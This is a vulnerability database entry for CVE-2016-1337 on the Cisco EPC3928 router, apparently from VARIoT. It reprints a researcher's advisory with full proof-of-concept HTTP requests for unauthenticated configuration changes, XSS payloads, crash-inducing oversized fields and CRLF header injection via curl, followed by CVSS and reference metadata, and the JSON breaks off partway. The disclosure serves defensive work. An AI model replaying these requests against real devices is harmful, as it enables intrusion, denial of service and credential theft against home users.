VAR-201607-0005
Vulnerability from variot - Updated: 2024-02-14 22:51Cisco EPC3928 devices allow remote attackers to obtain sensitive configuration and credential information by making requests during the early part of the boot process, related to a "Boot Information Disclosure" issue, aka Bug ID CSCux17178. The CiscoEPC3928 is a wireless router product from Cisco. A security vulnerability exists in CiscoEPC3928. This issue is being tracked by Cisco Bug ID CSCux17178. Variants of this product can also be affected. Using combination of several vulnerabilities, attacker is able to remotely download and decode boot configuration file, which you can see on PoC video below. The attacker is also able to reconfigure device in order to perform attacks on the home-user, inject additional data to modem http response or extract sensitive informations from the device, such as the Wi-Fi key.
Until Cisco releases workarounds or patches, we recommend verify access to the web-based management panel and make sure that it is not reachable from the external network.
Vulnerabilities: 1) Unauthorized Command Execution 2) Gateway Stored XSS 3) Gateway Client List DoS 4) Gateway Reflective XSS 5) Gateway HTTP Corruption DoS 6) "Stored" HTTP Response Injection 7) Boot Information Disclosure
========
PoC:
- Unathorized Command Execution
1 - Channel selection request:
POST /goform/ChannelsSelection HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/ChannelsSelection.asp Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 24
SAHappyUpstreamChannel=3
1 - Response:
HTTP/1.0 200 OK Server: PS HTTP Server Content-type: text/html Connection: close
RELOADvar totaltime=120;function time(){document.formnow.hh.value=(" "+totaltime+" Seconds ");totaltime--;} function refreshStatus(){window.setTimeout("window.parent.location.href='http://192.168.1.1'",totaltime*1000);}mytime=setInterval('time()',1000);dw(msg_goform34);dw(msg_goform35);refreshStatus();
2 - Clear logs request:
POST /goform/Docsis_log HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/Docsis_log.asp Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 41
BtnClearLog=Clear+Log&SnmpClearEventLog=0
2 - Response:
HTTP/1.0 302 Redirect Server: PS HTTP Server Location: http://192.168.1.1/Docsis_log.asp Content-type: text/html Connection: close
- Gateway Stored and Reflective Cross Site Scripting
Example #1:
1 \x96 Stored XSS via username change request:
POST /goform/Administration HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/Administration.asp Cookie: Lang=en; SessionID=2719880 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 165
working_mode=0&sysname=alert('XSS')&sysPasswd=home&sysConfirmPasswd=home&save=Save+Settings&preWorkingMode=1&h_wlan_enable=enable&h_user_type=common
1 \x96 Response:
HTTP/1.0 302 Redirect Server: PS HTTP Server Location: http://192.168.1.1/Administration.asp Content-type: text/html Connection: close
2 \x96 Redirect request:
GET /Administration.asp HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/Administration.asp Cookie: Lang=en; SessionID=2719880 DNT: 1 Connection: keep-alive
2 \x96 Response:
HTTP/1.1 200 OK Content-type: text/html Expires: Thu, 3 Oct 1968 12:00:00 GMT Pragma: no-cache Cache-Control: no-cache, must-revalidate Connection: close Content-Length: 15832
(...) dw(usertype); alert('XSS') (...) Example #2: #1 \x96 Reflected XSS via client list request: POST /goform/WClientMACList HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: 192.168.1.1/WClientMACList.asp Cookie: Lang=en; SessionID=109660 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 62 sortWireless=mac&h_sortWireless=mac" onmouseover=alert(1) x="y #1 \x96 Response: HTTP/1.0 302 Redirect Server: PS HTTP Server Location: 192.168.1.1/WClientMACList.asp Content-type: text/html Connection: close #2 \x96 Redirect request: GET /WClientMACList.asp HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: 192.168.1.1/WClientMACList.asp Cookie: Lang=en; SessionID=109660 Connection: keep-alive #2 \x96 Reponse: HTTP/1.1 200 OK Content-type: text/html Expires: Thu, 3 Oct 1968 12:00:00 GMT Pragma: no-cache Cache-Control: no-cache, must-revalidate Connection: close Content-Length: 7385 (...) (...) - Gateway Client List Denial of Service Device will crash after sending following request. # HTTP Request POST /goform/WClientMACList HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/WClientMACList.asp Cookie: Lang=en; SessionID=109660 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 62 sortWireless=mac&h_sortWireless=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX - Gateway HTTP Corruption Denial of Service Device will crash after sending following request. # HTTP Request POST /goform/Docsis_system HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/Docsis_system.asp Cookie: Lang=en; SessionID=348080 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 106 username_login=&password_login=&LanguageSelect=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&Language_Submit=0&login=Log+In - "Stored" HTTP Response Injection It is able to inject additional HTTP data to response, if string parameter of LanguageSelect won't be too long (in that case device will crash). Additional data will be stored in device memory and returned with every http response on port 80 until reboot. devil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10 HTTP/1.1 200 OK Content-type: text/html Expires: Thu, 3 Oct 1968 12:00:00 GMT Pragma: no-cache Cache-Control: no-cache, must-revalidate Connection: close Content-Length: 1469 devil@hell:~$ curl --data "username_login=&password_login=&LanguageSelect=en%0d%0aSet-Cookie: w00t&Language_Submit=0&login=Log+In" http://192.168.1.1/goform/Docsis_system -s > /dev/null devil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10 HTTP/1.1 200 OK Content-type: text/html Expires: Thu, 3 Oct 1968 12:00:00 GMT Pragma: no-cache Cache-Control: no-cache, must-revalidate Connection: close Set-Cookie: Lang=en Set-Cookie: w00t Set-Cookie: SessionID=657670 Content-Length: 1469 - Boot Information Disclosure In early booting phase, for a short period of time some administrator functions can be executed, and it is able to extract device configuration file. We wrote an exploit that crash the modem, and then retrieve and decode config in order to obtain users credentials. Exploit video PoC: https://www.youtube.com/watch?v=PHSx0s7Turo ======== CVE References: CVE-2015-6401 CVE-2015-6402 CVE-2016-1328 CVE-2016-1336 CVE-2016-1337 Cisco Bug ID\x92s: CSCux24935 CSCux24938 CSCux24941 CSCux24948 CSCuy28100 CSCux17178 Read more on our blog: http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/ Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201607-0005",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "epc3928",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": null
},
{
"model": "epc3928",
"scope": null,
"trust": 1.4,
"vendor": "cisco",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04560"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003416"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-294"
},
{
"db": "NVD",
"id": "CVE-2016-1337"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:cisco:epc3928_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:cisco:epc3928:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-1337"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Patryk Bogdan from Secorda security team.",
"sources": [
{
"db": "BID",
"id": "91541"
}
],
"trust": 0.3
},
"cve": "CVE-2016-1337",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2016-1337",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2016-04560",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-90156",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.1,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2016-1337",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-1337",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2016-04560",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201606-294",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-90156",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04560"
},
{
"db": "VULHUB",
"id": "VHN-90156"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003416"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-294"
},
{
"db": "NVD",
"id": "CVE-2016-1337"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cisco EPC3928 devices allow remote attackers to obtain sensitive configuration and credential information by making requests during the early part of the boot process, related to a \"Boot Information Disclosure\" issue, aka Bug ID CSCux17178. The CiscoEPC3928 is a wireless router product from Cisco. A security vulnerability exists in CiscoEPC3928. \nThis issue is being tracked by Cisco Bug ID CSCux17178. Variants of this product can also be affected. \nUsing combination of several vulnerabilities, attacker is able to remotely download and decode boot configuration file, which you can see on PoC video below. The attacker is also able to reconfigure device in order to perform attacks on the home-user, inject additional data to modem http response or extract sensitive informations from the device, such as the Wi-Fi key. \n\nUntil Cisco releases workarounds or patches, we recommend verify access to the web-based management panel and make sure that it is not reachable from the external network. \n\nVulnerabilities:\n1) Unauthorized Command Execution\n2) Gateway Stored XSS\n3) Gateway Client List DoS\n4) Gateway Reflective XSS\n5) Gateway HTTP Corruption DoS\n6) \"Stored\" HTTP Response Injection\n7) Boot Information Disclosure\n\n========\n\nPoC:\n\n- Unathorized Command Execution\n\n#1 - Channel selection request:\nPOST /goform/ChannelsSelection HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.1.1/ChannelsSelection.asp\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 24\n\nSAHappyUpstreamChannel=3\n\n#1 - Response:\nHTTP/1.0 200 OK\nServer: PS HTTP Server\nContent-type: text/html\nConnection: close\n\n\u003chtml lang=\"en\"\u003e\u003chead\u003e\u003ctitle\u003eRELOAD\u003c/title\u003e\u003cmeta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" /\u003e\u003cscript language=\"javascript\" type=\"text/javascript\" src=\"../active.js\"\u003e\u003c/script\u003e\u003cscript language=\"javascript\" type=\"text/javascript\" src=\"../lang.js\"\u003e\u003c/script\u003e\u003cscript language=\"javascript\" type=\"text/javascript\"\u003evar totaltime=120;function time(){document.formnow.hh.value=(\" \"+totaltime+\" Seconds \");totaltime--;} function refreshStatus(){window.setTimeout(\"window.parent.location.href=\u0027http://192.168.1.1\u0027\",totaltime*1000);}mytime=setInterval(\u0027time()\u0027,1000);\u003c/script\u003e\u003c/head\u003e\u003cbody BGCOLOR=\"#CCCCCC\" TEXT=black\u003e\u003cform name=\"formnow\"\u003e\u003cHR\u003e\u003ch1\u003e\u003cscript language=\"javascript\" type=\"text/javascript\"\u003edw(msg_goform34);\u003c/script\u003e\u003ca href=\"http://192.168.1.1/index.asp\"\u003e\u003cscript language=\"javascript\" type=\"text/javascript\"\u003edw(msg_goform35);\u003c/script\u003e\u003c/a\u003e\u003cscript language=\"javascript\"\u003erefreshStatus();\u003c/script\u003e\u003cinput type=\"text\" name=\"hh\" style=\"background-color:#CCCCCC;font-size:36;border:n\n one\"\u003e\u003c/h1\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e\n\n#2 - Clear logs request:\nPOST /goform/Docsis_log HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.1.1/Docsis_log.asp\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 41\n\nBtnClearLog=Clear+Log\u0026SnmpClearEventLog=0\n\n#2 - Response:\nHTTP/1.0 302 Redirect\nServer: PS HTTP Server\nLocation: http://192.168.1.1/Docsis_log.asp\nContent-type: text/html\nConnection: close\n\n\n\n- Gateway Stored and Reflective Cross Site Scripting\n\nExample #1:\n\n#1 \\x96 Stored XSS via username change request:\nPOST /goform/Administration HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.1.1/Administration.asp\nCookie: Lang=en; SessionID=2719880\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 165\n\nworking_mode=0\u0026sysname=\u003cscript\u003ealert(\u0027XSS\u0027)\u003c/script\u003e\u0026sysPasswd=home\u0026sysConfirmPasswd=home\u0026save=Save+Settings\u0026preWorkingMode=1\u0026h_wlan_enable=enable\u0026h_user_type=common\n\n#1 \\x96 Response:\nHTTP/1.0 302 Redirect\nServer: PS HTTP Server\nLocation: http://192.168.1.1/Administration.asp\nContent-type: text/html\nConnection: close\n\n\n#2 \\x96 Redirect request:\nGET /Administration.asp HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.1.1/Administration.asp\nCookie: Lang=en; SessionID=2719880\nDNT: 1\nConnection: keep-alive\n\n#2 \\x96 Response:\nHTTP/1.1 200 OK\nContent-type: text/html\nExpires: Thu, 3 Oct 1968 12:00:00 GMT\nPragma: no-cache\nCache-Control: no-cache, must-revalidate\nConnection: close\nContent-Length: 15832\n\n\u003c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\"\u003e\n\u003chtml lang=\"en\"\u003e\n\u003chead\u003e\n(...)\n\u003ctr\u003e\n\u003ctd\u003e\n\u003cscript language=\"javascript\" type=\"text/javascript\"\u003edw(usertype);\u003c/script\u003e\n\u003c/td\u003e\n\u003ctd nowrap\u003e\n\u003cscript\u003ealert(\u0027XSS\u0027)\u003c/script\u003e\n\u003c/TD\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n(...)\n\n\nExample #2:\n\n#1 \\x96 Reflected XSS via client list request:\nPOST /goform/WClientMACList HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: 192.168.1.1/WClientMACList.asp\nCookie: Lang=en; SessionID=109660\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 62\n\nsortWireless=mac\u0026h_sortWireless=mac\" onmouseover=alert(1) x=\"y\n\n#1 \\x96 Response:\nHTTP/1.0 302 Redirect\nServer: PS HTTP Server\nLocation: 192.168.1.1/WClientMACList.asp\nContent-type: text/html\nConnection: close\n#2 \\x96 Redirect request:\nGET /WClientMACList.asp HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: 192.168.1.1/WClientMACList.asp\nCookie: Lang=en; SessionID=109660\nConnection: keep-alive\n\n#2 \\x96 Reponse:\nHTTP/1.1 200 OK\nContent-type: text/html\nExpires: Thu, 3 Oct 1968 12:00:00 GMT\nPragma: no-cache\nCache-Control: no-cache, must-revalidate\nConnection: close\nContent-Length: 7385\n\n\u003c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\"\u003e\n\u003chtml lang=\"en\"\u003e\n\u003chead\u003e\n(...)\n\u003c/table\u003e\n\u003c/div\u003e\n\u003cinput type=\"hidden\" name=\"h_sortWireless\" value=\"mac\" onmouseover=alert(1) x=\"y\" /\u003e\n\u003c/form\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n(...)\n\n\n\n- Gateway Client List Denial of Service\n\nDevice will crash after sending following request. \n\n# HTTP Request\nPOST /goform/WClientMACList HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.1.1/WClientMACList.asp\nCookie: Lang=en; SessionID=109660\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 62\n\nsortWireless=mac\u0026h_sortWireless=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n\n\n\n- Gateway HTTP Corruption Denial of Service\n\nDevice will crash after sending following request. \n\n# HTTP Request\nPOST /goform/Docsis_system HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.1.1/Docsis_system.asp\nCookie: Lang=en; SessionID=348080\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 106\n\nusername_login=\u0026password_login=\u0026LanguageSelect=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\u0026Language_Submit=0\u0026login=Log+In\n\n\n\n- \"Stored\" HTTP Response Injection\n\nIt is able to inject additional HTTP data to response, if string parameter of LanguageSelect won\u0027t be too long (in that case device will crash). \nAdditional data will be stored in device memory and returned with every http response on port 80 until reboot. \n\ndevil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10\nHTTP/1.1 200 OK\nContent-type: text/html\nExpires: Thu, 3 Oct 1968 12:00:00 GMT\nPragma: no-cache\nCache-Control: no-cache, must-revalidate\nConnection: close\nContent-Length: 1469\n\n\u003c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\"\u003e\n\u003chtml lang=\"en\"\u003e\n\ndevil@hell:~$ curl --data \"username_login=\u0026password_login=\u0026LanguageSelect=en%0d%0aSet-Cookie: w00t\u0026Language_Submit=0\u0026login=Log+In\" http://192.168.1.1/goform/Docsis_system -s \u003e /dev/null\n\ndevil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10\nHTTP/1.1 200 OK\nContent-type: text/html\nExpires: Thu, 3 Oct 1968 12:00:00 GMT\nPragma: no-cache\nCache-Control: no-cache, must-revalidate\nConnection: close\nSet-Cookie: Lang=en\nSet-Cookie: w00t\nSet-Cookie: SessionID=657670\nContent-Length: 1469\n\n\n\n- Boot Information Disclosure\n\nIn early booting phase, for a short period of time some administrator functions can be executed, and it is able to extract device configuration file. We wrote an exploit that crash the modem, and then retrieve and decode config in order to obtain users credentials. \n\nExploit video PoC: https://www.youtube.com/watch?v=PHSx0s7Turo\n\n\n========\n\nCVE References:\nCVE-2015-6401\nCVE-2015-6402\nCVE-2016-1328\nCVE-2016-1336\nCVE-2016-1337\n\nCisco Bug ID\\x92s:\nCSCux24935\nCSCux24938\nCSCux24941\nCSCux24948\nCSCuy28100\nCSCux17178\n\nRead more on our blog:\nhttp://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-1337"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003416"
},
{
"db": "CNVD",
"id": "CNVD-2016-04560"
},
{
"db": "BID",
"id": "91541"
},
{
"db": "VULHUB",
"id": "VHN-90156"
},
{
"db": "PACKETSTORM",
"id": "137379"
}
],
"trust": 2.61
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-90156",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90156"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-1337",
"trust": 3.5
},
{
"db": "BID",
"id": "91541",
"trust": 1.4
},
{
"db": "PACKETSTORM",
"id": "137379",
"trust": 1.3
},
{
"db": "EXPLOIT-DB",
"id": "39904",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003416",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201606-294",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2016-04560",
"trust": 0.6
},
{
